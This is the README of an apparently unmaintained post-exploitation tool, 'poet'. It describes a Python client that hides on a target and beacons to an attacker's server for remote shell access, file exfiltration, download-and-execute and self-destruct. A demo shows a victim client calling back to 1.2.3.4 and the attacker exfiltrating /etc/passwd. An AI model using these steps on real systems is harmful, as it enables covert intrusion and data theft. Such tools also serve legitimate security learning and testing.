Repository: https://github.com/offlinemark/poet (GitHub; Python; MIT license; topics: beacon, pentest, post-exploitation, python, rat, security). Description: "[unmaintained] Post-exploitation tool". Created 2014-05-08, last push 2016-01-28; 183 stars, 55 forks and 25 open issues at indexing time (2024-10-19). The README follows.

# poet

A simple POst-Exploitation Tool.

## overview

The client program runs on the target machine and is configured with an IP
address (the server) to connect to and a frequency to connect at. If the server
isn't running when the client tries to connect, the client quietly sleeps and
tries again at the next interval. If the server is running, however, the
attacker gets a control shell for the client and can perform various actions
on the target including:

- reconnaissance
- remote shell
- file exfiltration
- download and execute
- self destruct

## demo

This is just a small sample of what Poet can do.

The scenario is, an attacker has gotten access to the victim's machine and
downloaded and executed the client. She does not have the server running at
this point, but that's fine: the client waits patiently. Eventually the
attacker is ready and starts the server, first starting a shell and executing
`uname -a`, then exfiltrating `/etc/passwd`. Then she exits and detaches from
the client, which continues running on the target waiting for the next
opportunity to connect to the server. Later, she connects again,
self-destructing the client, removing all traces from the target.

Victim's Machine (5.4.3.2):

```
$ ./poet-client 1.2.3.4 10  # poet-client daemonizes, so there's nothing to see
```

> Warning: After running this command, you'll need to either run `selfdestruct`
> from the server, or kill the `poet-client` process to stop the client.

Attacker's Machine (1.2.3.4):

```
$ sudo ./poet-server

                          _
        ____  ____  ___  / /_
       / __ \/ __ \/ _ \/ __/
      / /_/ / /_/ /  __/ /
     / .___/\____/\___/\__/
    /_/

[+] (06/28/15 03:58:42) Dropping privileges to uid: 501, gid: 20
[+] (06/28/15 03:58:42) Poet server started (port 443)
[+] (06/28/15 03:58:50) Connected By: ('127.0.0.1', 54494) -> VALID
[+] (06/28/15 03:58:50) Entering control shell
Welcome to posh, the Poet Shell!
Running `help' will give you a list of supported commands.
posh > help
Commands:
  chint
  dlexec
  exec
  exfil
  exit
  help
  recon
  selfdestruct
  shell
posh > shell
posh > user@server $ uname -a
Linux lolServer 3.8.0-29-generic #42~precise1-Ubuntu SMP Wed May 07 16:19:23 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
posh > user@server $ ^D
posh > exfil /etc/passwd
posh : exfil written to archive/20150628/exfil/passwd-201506285917.txt
posh > ^D
[+] (06/28/15 03:59:18) Exiting control shell
[-] (06/28/15 03:59:18) Poet server terminated
$ sudo ./poet-server

                          _
        ____  ____  ___  / /_
       / __ \/ __ \/ _ \/ __/
      / /_/ / /_/ /  __/ /
     / .___/\____/\___/\__/
    /_/

[+] (06/28/15 03:59:26) Dropping privileges to uid: 501, gid: 20
[+] (06/28/15 03:59:26) Poet server started (port 443)
[+] (06/28/15 03:59:28) Connected By: ('127.0.0.1', 54542) -> VALID
[+] (06/28/15 03:59:28) Entering control shell
Welcome to posh, the Poet Shell!
Running `help' will give you a list of supported commands.
posh > selfdestruct
[!] WARNING: You are about to permanently remove the client from the target.
    You will immediately lose access to the target. Continue? (y/n) y
[+] (06/28/15 03:59:33) Exiting control shell
[-] (06/28/15 03:59:33) Poet server terminated
```

## getting started

Go to the [releases](http://github.com/mossberg/poet/releases) page and
download the latest `poet-client` and `poet-server` files available.

Then skip to the Usage section below.

Alternatively, you can build Poet yourself (it's pretty easy, see below).

## building

Make sure you have the `python2.7` and `zip` executables available.

```
$ git clone https://github.com/mossberg/poet
$ cd poet
$ make
```

This will create a `bin/` directory which contains `poet-client`
and `poet-server`.

## usage

Poet is easy to use, and requires nothing more than the Python (2.7)
standard library. To test it out locally, a typical invocation would look like:

Terminal 1:

```
$ ./poet-client 127.0.0.1 1 --debug --no-selfdestruct
```

> By default, the Poet client daemonizes and deletes itself from disk, so
> that behavior is suppressed using the `--debug` and `--no-selfdestruct`
> flags.

Terminal 2:

```
$ sudo ./poet-server
```

> By default, the server needs to be run as root (using `sudo`) because
> the default port it binds to is 443. If that makes you uncomfortable, simply
> omit `sudo` and use the `-p <PORT>` flag on both the client and server. Pick a
> nice, high number for your port (above 1024).

### configuration

The `common/config.py` file contains various **optional** configuration
settings for Poet builds.

- `AUTH`: Secret authentication token shared between the client and server for
  client authentication. Note that the default one is anything but secret. For
  any non-testing usage, it is recommended to change it to another unguessable
  value. Note that pre-built packages use the default, public authentication
  token, so a server built from them accepts any client that presents that
  default. Because the channel itself is not encrypted (see concerns below),
  the token only decides which clients the server will talk to; it does nothing
  to protect the contents of the session.
- `ARCHIVE_DIR`: Directory used by the server to store files (exec output,
  exfil, recon, etc).
- `SERVER_IP`: IP address of the server.
- `BEACON_INTERVAL`: Seconds between client beacons to the server.

The `SERVER_IP` and `BEACON_INTERVAL` configurations allow information
previously required in command line arguments to be baked into the final
executables such that the final executable can simply be executed with no
arguments. Values of `None` for either of them cause them to revert to default
behavior (required command line arg for `SERVER_IP`, optional command line
argument for `BEACON_INTERVAL`).

### client

```
$ ./poet-client -h
usage: poet-client [-h] [-p PORT] [--debug] [--no-daemon] [--no-selfdestruct]
                   IP [INTERVAL]

positional arguments:
  IP                    Poet Server
  INTERVAL              Beacon Interval, in seconds. Default: 600

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT
  --debug               show debug messages. implies --no-daemon
  --no-daemon           don't daemonize
  --no-selfdestruct     don't selfdestruct
```

Poet is a client/server application. The client is executed on the target and
beacons back to the server at a certain time interval. The only required
argument is the IP address where the server is or will be running. Following
it can optionally be the time interval in seconds of how frequently to beacon
back, which defaults to 10 minutes. The port for the client to beacon out on
can be specified with the `-p` flag. All other flags would not be used during
"real" usage and exist mainly for debugging.

### server

```
$ ./poet-server -h
usage: poet-server [-h] [-p PORT] [-v]

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT
  -v, --version         prints the Poet version number and exits
```

The server is executed on the user's own machine and listens for beacons from
the client. By default, it listens on a privileged port (443) and must be run
with privileges (which are dropped immediately after binding). The `-p` flag
can be used to avoid this by selecting an unprivileged port to listen on
(>1024).

### extensibility

Poet is highly extensible through its module framework; in fact, nearly every
command available at the posh shell is implemented as a module. They can be
viewed in the `common/modules/` directory. The `common/modules/template.py`
serves as a barebones example module, to be used as a starting point.
To add a Poet module, simply place it into the `common/modules/` directory
and rebuild Poet using `make`.

Here is a simple example module showing basic communication between the client
and server. The module registers a posh command, sends a string over, the
client reverses it and sends it back, and the server prints it out.

```
# Note: this module doesn't check if an argv[1] was given

import module


@module.server_handler('reverse')
def server(server, argv):
    print('Sending: {}'.format(argv[1]))
    # argv here is ['reverse', ...]
    response = server.conn.exchange(' '.join(argv))
    print('Received: {}'.format(response))


@module.client_handler('reverse')
def client(client, inp):
    # inp here is 'reverse ...'
    client.s.send(inp.split()[1][::-1])
```

The module begins with

```
import module
```

This is required, and is needed to register with the module framework.

The next section is the server-side component of the module.

```
@module.server_handler('reverse')
def server(server, argv):
    print('Sending: {}'.format(argv[1]))
    # argv here is ['reverse', ...]
    response = server.conn.exchange(' '.join(argv))
    print('Received: {}'.format(response))
```

The `@module.server_handler()` decorator is used to register a posh command
by passing in the command name as a decorator parameter and defining a handler
function to execute when the command is run. The handler function must accept
two parameters. One is the instance of the `PoetServer` that called the module,
and the other is the command string entered, represented as a list of
arguments. The server instance exists for the module to be able to use
helper functions for communicating with the client, writing files to the
archive directory, etc. The module uses `server.conn.exchange()` to send
the command line entered as a string to the client and get the response as the
return value.

The client-side component of the module is next.

```
@module.client_handler('reverse')
def client(client, inp):
    # inp here is 'reverse ...'
    client.s.send(inp.split()[1][::-1])
```

The `@module.client_handler()` decorator is used to register a task for the
client to react to and process. Since the client and server communicate by
passing strings between them, the first word of the string is the keyword
for a particular task. The module registers a client handler function to
execute when a message comes in from the server starting with 'reverse'.
Similar to the server handler, the client handler must accept parameters for
the instance of the `PoetClient` which called it, and the input string
passed from the server. The client then uses the `client.s.send()` function
to send data back to the server, in this case, the first argument, reversed.

In action, this looks like

```
posh > reverse poet
Sending: poet
Received: teop
```

## concerns

Documented concerns:

- lack of cryptographically protected communications: commands, shell output
  and exfiltrated files cross the network without encryption or integrity
  protection, so anyone on the path can read or alter them
- low interval beacons are **noisy** and generate TCP RSTs when the server is
  inactive: every attempt against the closed server port ends in a RST, and a
  short fixed interval leaves a very regular pattern in connection logs on
  the target side
- shell command is not a "real" shell and does not support most builtins found
  in standard shells

## disclaimer

I am building Poet purely for my own education and learning experience.
The code is freely available because I think it might be useful to others
interested in learning about this sort of thing. Use it responsibly.